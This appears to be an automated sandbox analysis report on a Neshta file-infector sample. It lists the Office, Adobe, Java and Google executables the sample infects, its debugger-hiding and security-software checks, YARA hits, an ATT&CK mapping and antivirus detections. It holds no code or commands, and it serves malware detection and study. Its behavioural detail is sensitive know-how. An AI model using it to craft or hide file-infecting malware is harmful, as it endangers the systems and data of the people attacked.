                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00405080 FindFirstFileA,FindNextFileA,FindClose,0_2_00405080
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00405634 FindFirstFileA,FindNextFileA,FindClose,0_2_00405634
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00404F6C FindFirstFileA,FindClose,0_2_00404F6C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0C4
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0CC
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,0_2_0040F13F
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,0_2_004056A7
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040EA04 FindFirstFileA,FindClose,0_2_0040EA04
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040EB16 FindFirstFileA,FindClose,0_2_0040EB16
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,0_2_0040EB18
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,0_2_00406D40
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior

                  Anti Debugging:

                  barindex
                  Hides threads from debuggersShow sources
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe' Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe' Jump to behavior
                  Source: Z68mMCAxFZ.exe, 00000000.00000002.940244910.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Program Manager
                  Source: Z68mMCAxFZ.exe, 00000000.00000002.940244910.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: Z68mMCAxFZ.exe, 00000000.00000002.940244910.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Progman
                  Source: Z68mMCAxFZ.exe, 00000000.00000002.940244910.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: GetLocaleInfoA,0_2_0040D74C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: GetLocaleInfoA,0_2_00403CB4
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040F270 GetLocalTime,0_2_0040F270
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040D815 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,0_2_0040D815
                  Source: Z68mMCAxFZ.exe, 00000000.00000003.859433978.0000000002234000.00000004.00000001.sdmpBinary or memory string: MSASCui.exe
                  Source: Z68mMCAxFZ.exe, 00000000.00000003.859433978.0000000002234000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected NeshtaShow sources
                  Source: Yara matchFile source: Z68mMCAxFZ.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Z68mMCAxFZ.exe PID: 6284, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  GuLoader behavior detectedShow sources
                  Source: Initial fileSignature Results: GuLoader behavior

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management InstrumentationRegistry Run Keys / Startup Folder1Process Injection12Masquerading22Input Capture11System Time Discovery1Taint Shared Content1Input Capture11Exfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Virtualization/Sandbox Evasion21LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerSecurity Software Discovery42SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSVirtualization/Sandbox Evasion21Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Z68mMCAxFZ.exe86%VirustotalBrowse
                  Z68mMCAxFZ.exe100%AviraW32/Neshta.A
                  Z68mMCAxFZ.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Neshta.A
                  C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Uninstall.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%AviraW32/Neshta.A
